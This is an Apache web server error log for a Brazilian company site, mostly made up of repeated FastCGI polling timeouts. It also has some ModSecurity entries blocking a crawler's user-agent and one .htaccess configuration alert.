[Sun Mar 15 19:16:25.581798 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47028] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:16:47.125795 2026] [proxy_fcgi:error] [pid 11972:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:47324] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:17:11.109327 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47610] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:17:32.129366 2026] [proxy_fcgi:error] [pid 32654:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:47904] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:17:55.277779 2026] [proxy_fcgi:error] [pid 32654:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48194] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:18:17.033951 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48484] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:18:39.093864 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:48678] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:19:00.129816 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:48862] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:19:21.045939 2026] [proxy_fcgi:error] [pid 11972:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:49058] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:19:28.267018 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.244.31:34968] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcwcAlT9VtDQc7bgUxHjgAAAQs"]
[Sun Mar 15 19:19:42.140558 2026] [proxy_fcgi:error] [pid 21805:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:49324] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:20:03.133804 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49674] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:20:16.651041 2026] [:error] [pid 32654:tid 140411733534464] [client 74.7.228.16:58566] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcwoAlT9VtDQc7bgUxHqAAAAQE"]
[Sun Mar 15 19:20:24.137801 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:49944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:20:47.109129 2026] [proxy_fcgi:error] [pid 21533:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:50178] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:21:08.117929 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:50374] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:21:29.133809 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:50648] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:21:51.126659 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50912] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:22:14.317863 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:51236] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:22:37.141863 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51526] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:22:59.098619 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:51842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:23:21.119557 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:52128] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:23:42.145861 2026] [proxy_fcgi:error] [pid 32654:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52316] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:24:03.045849 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52514] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:24:25.119967 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52710] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:24:46.129824 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52944] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:24:56.887577 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.244.31:41886] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcxuHbQATo66fKoS7z9GwAAAMs"]
[Sun Mar 15 19:25:08.777891 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:53152] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:25:30.045886 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:53472] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:25:44.127483 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.228.16:36590] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcx6LABkC4fWIHEf8GeiAAAAE0"]
[Sun Mar 15 19:25:51.125801 2026] [proxy_fcgi:error] [pid 32654:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:53742] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:26:12.130485 2026] [proxy_fcgi:error] [pid 21806:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:26:33.131476 2026] [proxy_fcgi:error] [pid 21946:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:54348] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:26:55.118984 2026] [proxy_fcgi:error] [pid 21533:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54592] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:27:16.125850 2026] [proxy_fcgi:error] [pid 11972:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54754] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:27:37.141795 2026] [proxy_fcgi:error] [pid 21946:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54906] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:27:59.122261 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:55220] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:28:21.125835 2026] [proxy_fcgi:error] [pid 32654:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:55438] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:28:44.117840 2026] [proxy_fcgi:error] [pid 21533:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:55666] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:29:07.145765 2026] [proxy_fcgi:error] [pid 32654:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55972] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:29:28.121998 2026] [proxy_fcgi:error] [pid 21533:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:56216] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:29:49.137872 2026] [proxy_fcgi:error] [pid 21806:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56434] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:30:00.823101 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.244.31:37406] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abcy6Jqj1wV0Si-OkeeZPQAAABc"]
[Sun Mar 15 19:30:10.129795 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56630] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:30:31.121903 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:56792] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:30:53.121822 2026] [proxy_fcgi:error] [pid 11972:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57012] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:31:14.078162 2026] [proxy_fcgi:error] [pid 21806:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:57266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:31:35.129824 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:57466] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:31:57.126060 2026] [proxy_fcgi:error] [pid 21806:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:32:19.777765 2026] [proxy_fcgi:error] [pid 21805:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:57922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:32:41.123187 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:58132] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:33:02.129995 2026] [proxy_fcgi:error] [pid 21805:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58320] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:33:24.119822 2026] [proxy_fcgi:error] [pid 32654:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58570] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:33:45.129907 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58786] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:34:07.077445 2026] [proxy_fcgi:error] [pid 21805:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59080] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:34:29.449849 2026] [proxy_fcgi:error] [pid 21946:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:59280] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:34:51.133794 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:59510] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:35:12.130099 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:59746] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:35:34.129782 2026] [proxy_fcgi:error] [pid 32654:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60002] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:35:55.037810 2026] [proxy_fcgi:error] [pid 21805:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:60238] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:36:16.133884 2026] [proxy_fcgi:error] [pid 21946:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60446] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:36:37.128633 2026] [proxy_fcgi:error] [pid 11972:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60596] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:37:00.124093 2026] [proxy_fcgi:error] [pid 32654:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60866] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:37:22.117808 2026] [proxy_fcgi:error] [pid 21806:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:32898] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:37:43.134131 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:33156] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:38:09.129781 2026] [proxy_fcgi:error] [pid 11972:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33402] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:38:30.053845 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33614] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:38:51.125838 2026] [proxy_fcgi:error] [pid 21533:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33838] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:39:12.129777 2026] [proxy_fcgi:error] [pid 21805:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33994] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:39:33.069837 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34162] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:39:35.511499 2026] [core:alert] [pid 32654:tid 140411548894976] [client 66.249.74.169:52532] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Sun Mar 15 19:39:54.119598 2026] [proxy_fcgi:error] [pid 21533:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:40:20.069875 2026] [proxy_fcgi:error] [pid 21805:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:34658] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:40:40.560685 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.244.31:55806] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc1aHjZBu2q05ozVU8I7QAAAUk"]
[Sun Mar 15 19:40:42.130295 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34926] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:41:03.126452 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:35114] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:41:19.623326 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.228.16:51238] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc1j5qj1wV0Si-OkeeaVwAAABE"]
[Sun Mar 15 19:41:24.037818 2026] [proxy_fcgi:error] [pid 11972:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35410] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:41:45.129831 2026] [proxy_fcgi:error] [pid 21806:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35566] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:42:07.069921 2026] [proxy_fcgi:error] [pid 21805:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35822] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:42:29.129812 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:42:50.126158 2026] [proxy_fcgi:error] [pid 21946:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:43:11.133813 2026] [proxy_fcgi:error] [pid 32654:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36502] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:43:32.133831 2026] [proxy_fcgi:error] [pid 32654:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36712] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:43:55.068052 2026] [proxy_fcgi:error] [pid 32654:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37014] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:44:16.117785 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:37138] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:44:37.021807 2026] [proxy_fcgi:error] [pid 21805:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37328] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:44:59.129844 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37474] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:45:20.053852 2026] [proxy_fcgi:error] [pid 11972:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37706] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:45:42.057836 2026] [proxy_fcgi:error] [pid 11972:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:37890] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:46:02.083489 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.244.31:53200] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc2qrABkC4fWIHEf8GgRAAAAFA"]
[Sun Mar 15 19:46:04.070887 2026] [proxy_fcgi:error] [pid 11972:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38122] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:46:25.133859 2026] [proxy_fcgi:error] [pid 21946:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38276] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:46:36.526633 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.228.16:41276] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc2zHbQATo66fKoS7z_AAAAANc"]
[Sun Mar 15 19:46:46.033816 2026] [proxy_fcgi:error] [pid 11972:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38442] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:47:07.126320 2026] [proxy_fcgi:error] [pid 21533:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:38590] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:47:30.069905 2026] [proxy_fcgi:error] [pid 21805:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38832] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:47:51.145742 2026] [proxy_fcgi:error] [pid 21805:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39018] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:48:12.140122 2026] [proxy_fcgi:error] [pid 21805:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:39176] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:48:33.061931 2026] [proxy_fcgi:error] [pid 21946:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39290] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:48:55.125837 2026] [proxy_fcgi:error] [pid 21533:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39624] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:49:16.129876 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:49:38.126588 2026] [proxy_fcgi:error] [pid 11972:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39922] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:49:59.121800 2026] [proxy_fcgi:error] [pid 32654:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40078] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:50:21.125781 2026] [proxy_fcgi:error] [pid 21805:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:40306] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:50:43.090992 2026] [proxy_fcgi:error] [pid 21946:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:40506] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:51:07.133818 2026] [proxy_fcgi:error] [pid 11972:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40836] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:51:14.344469 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.244.31:35428] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc34nbQATo66fKoS7z_ZgAAAM4"]
[Sun Mar 15 19:51:28.125914 2026] [proxy_fcgi:error] [pid 21806:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:41026] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:51:46.184162 2026] [:error] [pid 11972:tid 140411658000128] [client 74.7.228.16:52666] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc4Apqj1wV0Si-OkeebSQAAAAo"]
[Sun Mar 15 19:51:49.129808 2026] [proxy_fcgi:error] [pid 21533:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41266] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:52:10.098460 2026] [proxy_fcgi:error] [pid 21806:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:41422] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:52:32.130106 2026] [proxy_fcgi:error] [pid 32654:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:41628] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:52:53.121203 2026] [proxy_fcgi:error] [pid 21533:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41802] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:53:14.128394 2026] [proxy_fcgi:error] [pid 11972:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42062] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:53:36.135695 2026] [proxy_fcgi:error] [pid 21533:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:42262] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:53:57.120988 2026] [proxy_fcgi:error] [pid 11972:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42568] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:54:18.124360 2026] [proxy_fcgi:error] [pid 21533:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42760] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:54:39.125789 2026] [proxy_fcgi:error] [pid 32654:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43070] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:55:00.141837 2026] [proxy_fcgi:error] [pid 21946:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43350] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:55:22.761447 2026] [proxy_fcgi:error] [pid 32654:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43626] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:55:44.122218 2026] [proxy_fcgi:error] [pid 21806:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:43842] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:56:05.119985 2026] [proxy_fcgi:error] [pid 21806:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:44144] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:56:29.133843 2026] [proxy_fcgi:error] [pid 21946:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:44396] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:56:40.739246 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.244.31:48880] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc5KAlT9VtDQc7bgUxLngAAAQ8"]
[Sun Mar 15 19:56:51.130811 2026] [proxy_fcgi:error] [pid 21806:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44724] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:57:12.125800 2026] [proxy_fcgi:error] [pid 32654:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45044] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:57:13.707161 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.228.16:35602] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abc5SXjZBu2q05ozVU8KlgAAAUE"]
[Sun Mar 15 19:57:34.139755 2026] [proxy_fcgi:error] [pid 21533:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45284] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:57:56.125812 2026] [proxy_fcgi:error] [pid 21806:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:45556] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:58:18.110891 2026] [proxy_fcgi:error] [pid 21805:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45766] AH01075: Error dispatching request to : (polling)
[Sun Mar 15 19:58:39.117827 2026] [proxy_fcgi:error] [pid 21805:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:46066] AH01075: Error dispatching request to : (polling)
